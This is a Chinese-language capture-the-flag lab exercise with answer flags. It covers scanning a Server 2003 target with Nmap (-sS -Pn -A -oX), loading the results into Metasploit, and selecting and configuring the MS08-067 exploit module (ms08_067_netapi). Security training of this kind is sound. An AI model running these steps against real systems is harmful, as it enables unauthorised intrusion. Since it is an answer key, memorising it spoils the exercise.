1.通过Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具Nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交(各参数之间用英文逗号分割,例a,b,c,d);
flag: sS,Pn,A,oX
2.根据第一题扫描的回显信息分析靶机操作系统版本信息,将操作系统版本信息作为Flag提交;
flag:Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
3.根据第一题扫描的回显信息分析靶机服务开放端口,分析开放的服务,并将共享服务的开放状态作为Flag提交;
flag:open
4.在Kali中,使用命令初始化msf数据库,并将使用的命令作为Flag提交;
flag:msfdb init
5.在Kali中,打开msf,使用db_import将扫描结果导入到数据库中,并查看导入的数据,将查看导入的数据要使用的命令作为Flag提交;
flag:hosts
6.在msfconsole使用search命令搜索MS08067漏洞攻击程序,并将回显结果中的漏洞时间作为Flag提交;
flag:2008-10-28
7.在msfconsole中利用MS08067漏洞攻击模块,将调用此模块的命令作为Flag提交;
flag:use exploit/windows/smb/ms08_067_netapi
8.在上一步的基础上查看需要设置的选项,并将回显中需设置的选项名作为Flag提交;
flag:RHOSTS
9.使用set命令设置目标IP(在第8步的基础上),并检测漏洞是否存在,将回显结果中最后四个单词作为Flag提交;
flag:Cannot reliably check exploitability
10.查看可选项中存在此漏洞的系统版本,判断该靶机是否有此漏洞,若有,将存在此漏洞的系统版本序号作为Flag提交,否则Flag为none。
flag:35